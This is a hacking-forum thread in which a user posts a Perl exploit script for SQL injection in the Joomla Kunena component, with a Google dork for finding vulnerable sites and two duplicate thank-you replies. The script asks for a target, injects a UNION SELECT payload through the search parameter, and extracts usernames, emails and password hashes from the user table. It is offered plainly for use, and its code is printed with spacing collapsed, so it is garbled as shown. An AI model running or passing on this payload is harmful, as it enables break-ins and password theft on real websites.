+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Joomla Kunena Component (index.php, search parameter) SQL Injection (/Thread-Joomla-Kunena-Component-index-php-search-parameter-SQL-Injection)
Joomla Kunena Component (index.php, search parameter) SQL Injection - Stricker - 10-27-2012
Code:
#!/usr/bin/perl
#Exploittitle:JoomlaComponent
com_kunenaSQLInjectionexploit
#GoogleDork:inurl:index.php?
option=com_kunena&
#ExploitAuthor:D35m0nd142
#Screenshot:http://imageshack.us/
f/155/comkunena2.png/
#VendorHomePage:http://
www.joomla.org/
#SpecialthankstoTaurusomar
system("clear");
print
"*********************************************
\n";
print"*JoomlaComponentcom_kunena
SQLInjection*\n";
print"* Codedby
D35m0nd142 *\n";
print
"*********************************************
\n";
sleep1;
useLWP::UserAgent;
print"Enterthetarget-->";
chomp(my$target=<STDIN>);
$code="%25%27%20and%201=2%29%20union
%20select%201,%20concat
%280x3a,username,0x3a,email,0x3a,0x3a,activation
%29,concat
%280x3a,username,0x3a,email,0x3a,password,0x3a,activation
%29,%27Super%20Administrator%27,
%27email%27,
%272009-11-26%2022:09:28%27,
%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from
%20jos_users--%20;";
$agent=LWP::UserAgent->new()or
die"[!]Errorwhileprocessing";
$agent->agent('Mozilla/5.0(WindowsNT
6.1;WOW64;rv:7.0.1)Gecko/20100101
Firefox/7.0.12011');
$host=$target."/index.php?
option=com_kunena&func=userlist&search=".
$code;
$ok=$agent->request(HTTP::Request-
>new(GET=>$host));
$ok1=$ok->content;if($ok1=~/
([0-9a-fA-F]{32})/){
print"[+]Passwordfound-->$1\n
$2\n";
sleep1;
}
else
{
print"Passwordnotfound\n";
}RE: Joomla Kunena Component (index.php, search parameter) SQL Injection - gdteska - 02-12-2013
thanks for this exploit !!!!!!1
RE: Joomla Kunena Component (index.php, search parameter) SQL Injection - gdteska - 02-12-2013
thanks for this exploit !!!!!!1